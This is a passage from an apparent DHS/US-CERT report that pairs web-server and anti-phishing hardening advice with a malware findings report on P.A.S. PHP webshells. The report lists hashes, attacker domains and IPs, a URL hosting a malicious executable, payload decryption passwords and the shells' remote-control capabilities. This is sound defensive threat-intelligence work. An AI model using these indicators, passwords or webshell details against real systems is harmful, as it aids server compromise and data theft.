TLP:WHITE
TLP:WHITE
Where third party products are integrated into the website (e.g., Adobe ColdFusion) ensure
that the product is configured according to DoD or vendor published hardening best
practices.1
Detect
Conduct regular log review. Key sources should include the network and host firewalls,
Intrusion Prevention System, proxy, and local event logs. Events of interest should include
high usage rates to suspicious IPs, odd timestamps on web files (dates that don
t match
previous content updates), odd connections destined for internal networks, suspicious files in
internet accessible locations, references to key words such as cmd.exe or eval.4 Auditing
should involve some kind of aggregator to store and secure the logs remotely. Even the best
auditing on the web server is useless if the attacker can just manipulate or delete them once
they have obtained control. The logs should be protected and regularly rolled up to a
centralized location for integration into a security information and event management system.
Develop all content in an offline environment and maintain a hash list of all web files.
Frequently compare the hashes of the files on the web server to the known good list
maintained offline (an automated method is preferred).
Obtain regular full system backups (including snapshots if it is a virtual machine).
Forensically the known good data that these can provide is extremely useful for detection.
Having a copy of the filesystem before a compromise to compare against the postcompromise filesystem can be a benefit to any analysis.
Analyze traffic flows looking for certain anomalous behaviors such as prolonged
connections, data frequently being pushed to the server (e.g., commands being sent to the
shell), frequent large data transfers (an indication of data exfiltration), and abnormal
encryption (anything that is not SSL/TLS or that negotiates using an alternate certificate) as
indicators of potential nefarious activity.2
Contain
Internet facing web servers should be deployed to a DMZ. All traffic to internal networks
from the DMZ should be significantly constrained and highly monitored.
Restrict outbound communications from the DMZ to all other networks. Communications
originating in the DMZ destined for the internal network should be minimal at most (ideally
this should never happen). An attacker who gains access to a web server in the DMZ should
have no capability to leverage that access in order to gain direct additional access in the
internal network. Web server communications to the internet should be restricted to http/https
only. All other ports and protocols should be blocked.
https://helpx.adobe.com/coldfusion/community-documentation/coldfusion-lockdown-guide.html
https://www.us-cert.gov/ncas/alerts/TA15-314A
51 of 56
51 of 56
TLP:WHITE
TLP:WHITE
When a Domain Controller (DC) is necessary in the DMZ, it is recommended that a
standalone DC and forest structure be deployed. Additionally, all accounts and resources in
the DMZ instance should have no association or likeness to the internal network.
Ensure separation of admin accounts. The web admin account should not be the same admin
account that is used elsewhere on the domain.
Respond
When a compromise is found, reset all credentials associated with the webserver (this may
expand to all accounts in the DMZ if it is suspected that the compromise has expanded to the
DC). This should include all user and service accounts, all domain accounts that have logged
onto that host and all local accounts, to include the Kerberos master ticket granting ticket on
the DC. Depending on the circumstances, it may also be necessary to take the suspected
server(s) or network offline during the remediation process.
All server files should be wiped and restored from a known good source. The organization
should prepare for a disaster recovery situation that includes a system compromise. Regular
backups and offline storage of the data files should be made before being transferred to the
DMZ production environment.
When all other response techniques have failed at remediating the suspected compromise, the
server(s) should be completely rebuilt or replaced. All data reconstitution efforts should stem
from a known good source (offline backup).
Defending Against Spear Phishing Attacks
Defend
Enforce application whitelisting on all endpoint workstations to prevent droppers or
unauthorized software from gaining execution on endpoints. Many phishing attacks involve
an executable that is dropped and installed on the victim
s machine. Application Whitelisting
will allow the organization to monitor programs and allow only those that are on the
approved whitelist to execute. This would help to stop the initial attack, even if the user has
clicked the link or opened a malicious attachment. There are many baseline rulesets that
come with the vendor product, but the organization should ensure that at least the user Temp
directories are blocked for execution since this is where numerous phishing emails attempt to
drop and execute malware.
Disable Macros in office products. Macros are a common method for executing code through
an attached office document. Macros were often used as a means for initial exploitation in the
late 1990s and early 2000s but have seen a recent resurgence in frequency of use. Some
office products allow for the disabling of macros that originate from outside of the
organization and can provide a hybrid approach when the organization depends on the
legitimate use of macros. For Windows, specific settings can be configured to block Internet
originated macros from running. This can be done in the Group Policy Administrative
Templates for each of the associated Office products (specifically Word, Excel, and
PowerPoint). For example, to enable the policy setting for Microsoft Word 2016, in the
52 of 56
52 of 56
TLP:WHITE
TLP:WHITE
Group Policy Management Editor, select: User Configuration > Administrative Templates
> Microsoft Word 2016 > Word Options > Security > Trust Center > Block macros
from running in Office files from the Internet3
Utilize up to date web browsers on the network for increased security enhancements. These
improvements may include a sandboxing feature that would allow the browser to contain any
malicious content and protect the endpoint if an emailed link is clicked.
Deploy web and email filters on the network and configure these devices to scan for known
bad domains, sources, and addresses; block these before messages are received and
downloaded. This action will help to reduce the attack surface at the network
s first level of
defense. In addition, attachments should be filtered. The network defenses should only allow
approved extensions to pass through to the email client. Most .exe, scripting extensions
(including .bat, .js, and .ps1) and other executable extensions should be blocked.
Scan all emails, attachments, and downloads both on host and at the mail gateway with a
reputable antivirus solution that includes cloud reputation services. Taking advantage of
cloud reputation advancements provides rapid response capabilities and the integration of a
broad base of cyber defense intelligence.
Organizations should ensure that they have disabled HTML from being used in emails, as
well as disabling links. Everything should be forced to plain text. This will reduce the
likelihood of potentially dangerous scripts or links being sent in the body of the email, and
also will reduce the likelihood of a user just clicking something without thinking about it.
With plain text, the user would have to go through the process of either typing in the link or
copying and pasting. This additional step will allow the user an extra opportunity for thought
and analysis before clicking on the link.
Establish a training mechanism to inform end users on proper email and web usage as well as
common indicators of phishing to be aware of. This training should be done at least annually
and should include a test that is scored and available for viewing by management and/or the
IT Security department. The training should inform users what suspicious emails look like,
what to do when they suspect phishing, as well as explain what they should post on any
websites in terms of personally identifiable information (PII) that may be used for phishing
campaigns (including email addresses, job titles, names, etc.). Consider real life interactive
training simulations where users are sent suspicious emails on a semi regular basis and
subsequently redirected to a phishing training site should they fail to adhere to the
organization
s best practices and policies.
Detect
Monitor event logs, email logs, and firewall logs for any indicators of a potential attack.
These could include emails from suspicious domains, installation of programs on machines
https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-blockmacros-and-help-prevent-infection/
53 of 56
53 of 56
TLP:WHITE
TLP:WHITE
that are unusual or not approved, unusual call outs to the internet from office products, nonsmtp traffic from the email client, strange child processes under the parent office process, or
spoofed domains sending or receiving traffic from the network. Strange Traffic/Behavior
(e.g., Spamming others) should also be looked for in the various logs. This is a strong
indicator that machine(s) are compromised in some way.
Using the antivirus software that is installed on the mailbox server and all of the clients,
review the alerts and logs regularly for any activity on the network. The sooner detection can
take place, the sooner remediation steps can start, and the amount of damage can be
minimalized.
Users play an important role in the detection of spear phishing if they understand the proper
reporting procedures of the organization. Users should be able to identify the correct
handling and alerting procedure that the users should follow for any suspicious email they
receive.
Using the logs from the organizations firewalls/filters/security devices/workstations,
administrators should always ensure that their whitelisted and blacklisted domains are up to
date. Admins should also check DoD blacklists for known bad domains and add these to their
filters as well. Using these logs and lists, the organization may benefit from other incidents
that have occurred to help in the future
Contain
Utilize application containment products that can be used to prevent the downloading and
propagation of malicious software on the network. If the organization is using some form of
web email, the browser must be containerized. If the organization is using a program for
email (e.g., Microsoft Outlook or Mozilla Thunderbird), then that program should be
containerized for protection. The Application Containment will open the browser or email
program in its own Virtual Machine and isolate it from the rest of the system. This allows the
execution of potential malware in a sandboxed environment so the host system is protected.
Implement front and back end email servers when running on site instantiations of mail
services. Having a front-end server allows the organization to have an extra layer of
protection on the network since the front-end mailbox server contains no user data and allows
a firewall to be placed before the back end server. This is also safer and more convenient for
any web accessed email since web traffic is not being allowed directly into the network,
protects from denial-of-service attacks, and authenticates requests before proxying them to
the back end server.4
Control where and when an administrator can log on, as well as what they can do when
logged onto a system. This can minimize the damage of a spear phishing attack. Admins
should never be allowed to browse the internet, nor should they be allowed to open any email
program. This will reduce the likelihood of an accidental click or download of a program that
could be malicious. This also will reduce the chances that a successful attacker will gain
https://technet.microsoft.com/en-us/library/bb124804(v=exchg.65).aspx
54 of 56
54 of 56
TLP:WHITE
TLP:WHITE
admin privileges immediately when they gain access to the system. Organizations can
accomplish this restriction a number of ways, including application whitelisting, VLAN
separation, dedicated administrator boxes, etc.
Ensure that standard user accounts are not a part of the local administrators group. The local
administrator account should also be denied network access and all built in local
administrator accounts should have a unique password value. It is a common tactic to look
for local administrator credentials as a method of expanding access across the network.
Making these values unique for each machine and denying that account network access
removes the attacker
s capability to easily expand access using the same credentials5.
Respond
If a phishing email is discovered or suspected, the organization needs to start their normal
investigation procedures. It may be as simple as deleting that email and updating the email
filter to prevent this address/domain from sending to the organization again, but it could also
trigger a normal incident response. If the email contained a link that was clicked, an
attachment that was downloaded, or a program that was executed, the organization may have
to remove any malicious content, discover the extent of the possible spread, detail any
exfiltration of data, or even remove the affected machine(s) or rebuild them.
Reset user credentials and all credentials associated with all compromised boxes. This should
include services accounts and machine accounts as well as the supporting Kerberos tickets.
Monitor all accounts associated with the spear-phishing event. User accounts who are
suspected to have been the victim of a successful phishing campaign should be forensically
monitored for abnormal behaviors including unusual connections to non-standard resources,
attempts to elevate privileges, enumeration behaviors on the local host machine as well as
remote systems, and attempts to execute odd programs or applications.
https://www.microsoft.com/en-us/download/details.aspx?id=36036
55 of 56
55 of 56
TLP:WHITE
TLP:WHITE
APPENDIX D: Malware Initial Findings Report (MIFR)-10105049
UPDATE 2 (TLP WHITE)
56 of 56
56 of 56
TLP:WHITE
TLP:WHITE
Malware Initial Findings Report (MIFR) - 10105049-Update2
2017-01-23
Notification
This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties
of any kind regarding any information contained within. The DHS does not endorse any commercial product or service, referenced in this
bulletin or otherwise.
This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no
foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules,
TLP:WHITE information may be distr buted without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov
/tlp/.
Summary
Description
This report is an update to MIFR-10105049 and provides additional analysis of the artifacts identified in the NCCIC Joint Analysis Report
(JAR 16-20296) dated December 19, 2016.
The artifacts analyzed in this report include 17 PHP files, 3 executables and 1 RTF file.
The PHP files are webshells designed to provide a remote user an interface for various remote operations. The rtf file is a malicious
document designed to install and execute a malicious executable.
Files
Processed
10b1306f322a590b9cef4d023854b850 (0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811bb09d328d71b36faa09)
128cc715b25d0e55704ed9b4a3f2ef55 (0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e)
1ec7f06f1ee4fa7cecd17244eec24e07 (a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806)
38f7149d4ec01509c3a36d4567125b18 (7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf)
617ba99be8a7d0771628344d209e9d8a (9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5)
66948b04173b523ca773c3073afb506d (449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602)
70f93f4f17d0e46137718fe59591dafb (bd7996752cac5d05ed9d1d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4)
78abd4cdccab5462a64ab4908b6056bd (6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46)
7fce89d5e3d59d8e849d55d604b70a6f (2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4)
81f1af277010cb78755f08dfcc379ca6 (ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e)
8f154d23ac2071d7f179959aaba37ad5 (55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641)
93f512e2d9d00bf0bcf1e03c6898cb1e (249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e)
a5e933d849367d623d1f2692b6691bbf (7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e)
ae7e3e531494b201fbf6021066ddd188 (9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0)
bfcb50cffca601b33c285b9f54b64cb1 (da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8)
c3e23ef7f5e41796b80ca9e59990fe9c (20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239)
dc4594dbeafbc8edfa0ac5983b295d9b (9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f)
e80f92faa5e11007f9ffea6df2297993 (3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7)
eddfe110da553a3dc721e0ad4ea1c95c (ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975)
f3ecf4c56f16d57b260b9cf6ec4519d6 (1343c905a9c8b0360c0665efa6af588161fda76b9d09682aaf585df1851ca751)
fc45abdd5fb3ffa4d3799737b3f597f4 (d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38)
Domains
Identified
private.directinvesting.com
cderlearn.com
wilcarobbe.com
one2shoppee.com
ritsoperrol.ru
littjohnwilhap.ru
insta.reduct.ru
editprod.waterfilter.in.ua
mymodule.waterfilter.in.ua/system/logs/xtool.exe
US-CERT MIFR-10105049-Update2
1 of 63
Identified
204.12.12.40
209.236.67.159
146.185.161.126
176.114.0.120
176.114.0.157
US-CERT MIFR-10105049-Update2
2 of 63
Files
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e
Details
Name
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e
Size
21522
Type
PHP script, ASCII text, with very long lines, with CRLF, LF line terminators
93f512e2d9d00bf0bcf1e03c6898cb1e
SHA1
b7c7446dc3c97909705899e3dcffc084081b5c9f
ssdeep
384:bx6Nx4A8ZPJ8s5o80bOIs+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunv:bx60A2PqsW8s7sMB/XTSfizpv+uunv
Entropy
6.11147480451
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aar
TrendMicro
PHP_WEBSHELL.SMA
Sophos
PHP/WebShell-O
Avira
PHP/Agent.12663
Microsoft
Ahnlab
ESET
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Agent.IB trojan
TrendMicroHouseCall
PHP_WEBSHELL.SMA
Ikarus
Backdoor.PHP.Fobushell
Relationships
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
(S) Interface for PAS v.3.1.0
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
da9f2804b16b369156e1b629ad3d2aac79326b94
284e43c7b8355f3db71912b8 (bfcb5)
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
20f76ada1721b61963fa595e3a2006c962253513
62b79d5d719197c190cd4239 (c3e23)
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
7b28b9b85f9943342787bae1c92cab39c01f9d82b
99eb8628abc638afd9eddaf (38f71)
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Related_To
ae67c121c7b81638a7cb655864d574f8a9e55e66
bcb9a7b01f0719a05fab7975 (eddfe)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
During runtime, this payload will be decoded and decrypted using combination of a base64_decode and a password.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
The password "root" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.1.0. This web-shell is a backdoor that provides an interface (see Screenshot) for various remote operations, such as file explorer,
searcher, SQL-client, network tools, command shell access, and server info features to a remote user once installed on the compromised
system. The following are some of the P.A.S webshell capabilities:
--Begin Capabilities-To view compromised server information.
File manager (copy, rename, move, download, upload, delete, jump, create files and folders).
Search files, objects, directories, and text in files.
SQL client to login and dump database and tables.
US-CERT MIFR-10105049-Update2
3 of 63
Network console to bindport, back-connect, and port scanner.
Command line console to execute command.
Execute PHP code.
--End Capabilities--
The webshell P.A.S. v.3.1.0 interface is shown in image 1.0.
Screenshots
Interface for PAS v.3.1.0
da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8
Details
Name
da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8
Size
21377
Type
PHP script, ASCII text, with very long lines
bfcb50cffca601b33c285b9f54b64cb1
SHA1
efcc0c18e10072b50deeca9592c76bc90f4d18ce
ssdeep
384:0x6Nx4A8ZPJ8s5o80bOIs+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunv:0x60A2PqsW8s7sMB/XTSfizpv+uunv
Entropy
6.10042530063
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
VirIT
Trojan.PHP.Shell.JB
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aar
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
NANOAV
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Agent.IB trojan
Trojan.Script.Crypt.dsonvo
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Relationships
da9f2804b16b369156e1b629ad3d2aac79326b94
284e43c7b8355f3db71912b8 (bfcb5)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The
password "avto" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality.
20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239
US-CERT MIFR-10105049-Update2
4 of 63
Details
Name
20f76ada1721b61963fa595e3a2006c96225351362b79d5d719197c190cd4239
Size
21377
Type
PHP script, ASCII text, with very long lines
c3e23ef7f5e41796b80ca9e59990fe9c
SHA1
0a3f7e0d0729b648d7bb6839db13c97f0b741773
ssdeep
384:JIiH2ER39I1Vv+kIPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUg:JIy2ER3CL+khWUYcsJtMcDiuSA93DuxD
Entropy
6.10091164773
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
VirIT
Trojan.PHP.Shell.LV
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aaw
TrendMicro
PHP_WEBSHELL.SMA
Sophos
PHP/WebShell-O
Avira
PHP/Agent.12662
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Relationships
20f76ada1721b61963fa595e3a2006c962253513
62b79d5d719197c190cd4239 (c3e23)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality.
7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf
Details
Name
7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf
Size
21633
Type
PHP script, ASCII text, with very long lines, with CRLF line terminators
38f7149d4ec01509c3a36d4567125b18
SHA1
d1828dce4bf476ca07629e1613dd77c3346e2c5a
ssdeep
384:0y6t/9+e9BhShtzX3vOjbkMlspeMucuA4ScHCpMO1LmMoVID+a5XHEuz8v:0y6L+4BIhhX/6IMyn5uMcHCpbkuz8v
Entropy
6.12095270355
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
VirIT
Trojan.PHP.Shell.JB
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.abc
TrendMicro
PHP_WEBSHELL.SMA
Sophos
US-CERT MIFR-10105049-Update2
PHP/WebShell-O
5 of 63
Avira
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/Agent.1266
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Agent.IB trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Relationships
7b28b9b85f9943342787bae1c92cab39c01f9d82b
99eb8628abc638afd9eddaf (38f71)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The
password "avto" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality.
ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975
Details
Name
ae67c121c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975
Size
21121
Type
PHP script, ASCII text, with very long lines, with no line terminators
eddfe110da553a3dc721e0ad4ea1c95c
SHA1
6b178cc9d630345356b9341613cd83bd588192e9
ssdeep
384:/YO/kOzhJ38bvqoWksNj4lCKlmI6KDzXpofabpTACAXDDe9GDtWNmu:/YIkOzhJs1WkqICKs0ofocCAXDDe9etO
Entropy
6.08010194218
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-1642041
Kaspersky
Backdoor.PHP.Agent.aat
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Relationships
ae67c121c7b81638a7cb655864d574f8a9e55e66
bcb9a7b01f0719a05fab7975 (eddfe)
Related_To
249ee048142d3d4b5f7ad15e8d4b98cf9491ee68
db9749089f559ada4a33f93e (93f51)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality.
6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46
Details
Name
6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46
Size
21191
Type
PHP script, ASCII text, with very long lines
78abd4cdccab5462a64ab4908b6056bd
US-CERT MIFR-10105049-Update2
6 of 63
SHA1
1a42bc32bdfeb468e6a98f9b69514adb7cc963ae
ssdeep
384:3cKqZSUbR58RkpmzijNeoBtqT/juu+/iSeClJTYZaPKWFbNx:sKqZ7dCupmzqN3K7jsFDTTeaX1Nx
Entropy
6.10207869759
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.abe
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.G
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Relationships
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
Related_To
(S) Interface for PAS v.3.0.10
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
Related_To
d285115e97c02063836f1cf8f91669c114052727c3
9bf4bd3c062ad5b3509e38 (fc45a)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The
password "we kome" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.0.10. This version (see Screenshot) and v.3.1.0 have similar functionality, except v.3.0.10 has safeMode, open base directory, and
disable functionality.The webshell P.A.S. v.3.0.10 interface is shown in image 2.0.
Screenshots
Interface for PAS v.3.0.10
d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38
Details
Name
d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38
Size
21191
Type
PHP script, ASCII text, with very long lines
fc45abdd5fb3ffa4d3799737b3f597f4
SHA1
adf649354ff4d1812e7de745214362959e0174b1
ssdeep
384:ccKqZSUbR58RkpmzijNeoBtqT/juu+/iSeClJTYZaPKWFbNUbxwx:pKqZ7dCupmzqN3K7jsFDTTeaX1NUbxG
Entropy
6.1021796546
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
US-CERT MIFR-10105049-Update2
7 of 63
NetGate
Trojan.Win32.Malware
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.abe
TrendMicro
PHP_WEBSHELL.SMA
Sophos
PHP/WebShell-O
Avira
PHP/Krypt k.AA
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Relationships
d285115e97c02063836f1cf8f91669c114052727c3
9bf4bd3c062ad5b3509e38 (fc45a)
Related_To
6fad670ac8febb5909be73c9f6b428179c6a7e942
94e3e6e358c994500fcce46 (78abd)
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The
password "123123" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S.
v.3.0.10. This file and 6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46 have the same functionality.
0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811bb09d328d71b36faa09
Details
Name
0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811bb09d328d71b36faa09
Size
21633
Type
PHP script, ASCII text, with very long lines, with CRLF line terminators
10b1306f322a590b9cef4d023854b850
SHA1
eac98f414abd9e6a39ce96f5547284c371a30a74
ssdeep
384:aflOAr6OucUytsS8UdzMV3u2SmsyCDHEToBCGIbGA3taDPWA+0BWdL1v:afUAr6OJB18Cc3u2jseTo/cGA3taD+Ae
Entropy
6.1212580823
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aax
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e
Details
Name
0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e
US-CERT MIFR-10105049-Update2
8 of 63
Size
21377
Type
PHP script, ASCII text, with very long lines
128cc715b25d0e55704ed9b4a3f2ef55
SHA1
93c3607147e24396cc8f508c21ce8ab53f9a0176
ssdeep
384:zvAz7TvcjKJp0eJ4ZZXIoQW9fq3C3W/e3+M/BF9xjzAMbaQCUv:jAzMjAp0/XIq9fq3CWoEUv
Entropy
6.10186106747
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AXV
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aau
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
1343c905a9c8b0360c0665efa6af588161fda76b9d09682aaf585df1851ca751
Details
Name
1343c905a9c8b0360c0665efa6af588161fda76b9d09682aaf585df1851ca751
Size
21355
Type
PHP script, ASCII text, with very long lines
f3ecf4c56f16d57b260b9cf6ec4519d6
SHA1
18eda2d7b0d42462cdef1794ad26e21a52d79dc6
ssdeep
384:DIiH2ER39I1Vv+kIPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUV:DIy2ER3CL+khWUYcsJtMcDiuSA93Dux0
Entropy
6.09871136883
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
